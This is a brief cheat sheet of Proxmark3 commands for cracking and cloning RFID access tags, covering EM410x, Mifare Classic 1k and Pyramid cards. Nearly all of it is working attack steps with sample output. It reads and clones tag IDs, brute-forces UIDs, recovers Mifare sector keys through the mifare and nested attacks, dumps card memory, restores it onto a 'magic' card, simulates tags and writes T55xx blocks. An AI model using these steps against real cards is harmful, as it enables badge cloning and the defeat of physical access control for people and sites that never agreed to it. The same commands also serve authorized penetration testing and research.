# RFID cracking

EM

# Cloning EM410x
proxmark3> lf read
proxmark3> data samples 30000
proxmark3> lf em4x em410xread
EM TAG ID      : 0DEADBEEF0
proxmark3> lf em4x em410xsim 0DEADBEEF0
proxmark3> lf em4x em410xwrite 0DEADBEEF0 1

# Bruteforcing UID - https://github.com/mtongsang/pm3Bruter
$ ./proxmark3 /dev/cu.usbmodem1411 -b -m 3 -c 256 -t 1122334455

Mifare classic 1k

# Key A for sector 0
proxmark3> hf mf mifare
Found valid key: a0a1a2a3a4a

# Keys A/B for all sectors
proxmark3> hf mf nested 1 0 A a0a1a2a3a4a5 d

# Dumping and reading stored data
proxmark3> hf mf dump
proxmark3> script run htmldump
$ xxd dumpkeys.bin
$ xxd dumpdata.bin

# Reading and writing blocks and sectors
proxmark3> hf mf rdbl 0 A a0a1a2a3a4a5
proxmark3> hf mf rdsc 0 A a0a1a2a3a4a5
proxmark3> hf mf wrbl 0 A a0a1a2a3a4a5
0300e5c81c0eec00000000004d494300

# Cloning a dumped tag (dumpdata.bin) using a magic chinnese card
proxmark3> hf mf csetuid 86bcfe41
proxmark3> hf mf restore

# Simulating a tag
proxmark3> hf 14a reader
 UID : 11 22 33 44
ATQA : 00 04
 SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proxmark3> hf 14a sim 1 11223344

Pyramid

# Cloning: read raw data
proxmark3> lf search
Pyramid ID Found - BitLength: 90 -unknown BitLength- (ABCDE), Raw: 11111111222222223333333344444444                                                         
Checksum XX passed
Valid Pyramid ID Found!

# Cloning: write raw data
proxmark3> lf t55xx write b 0 d 00107080
Writing page 0  block: 00  data: 0x00107080
proxmark3> lf t55xx write b 1 d 11111111
Writing page 0  block: 01  data: 0x11111111
proxmark3> lf t55xx write b 2 d 22222222
Writing page 0  block: 02  data: 0x22222222
proxmark3> lf t55xx write b 3 d 33333333
Writing page 0  block: 03  data: 0x33333333
proxmark3> lf t55xx write b 4 d 44444444
Writing page 0  block: 04  data: 0x44444444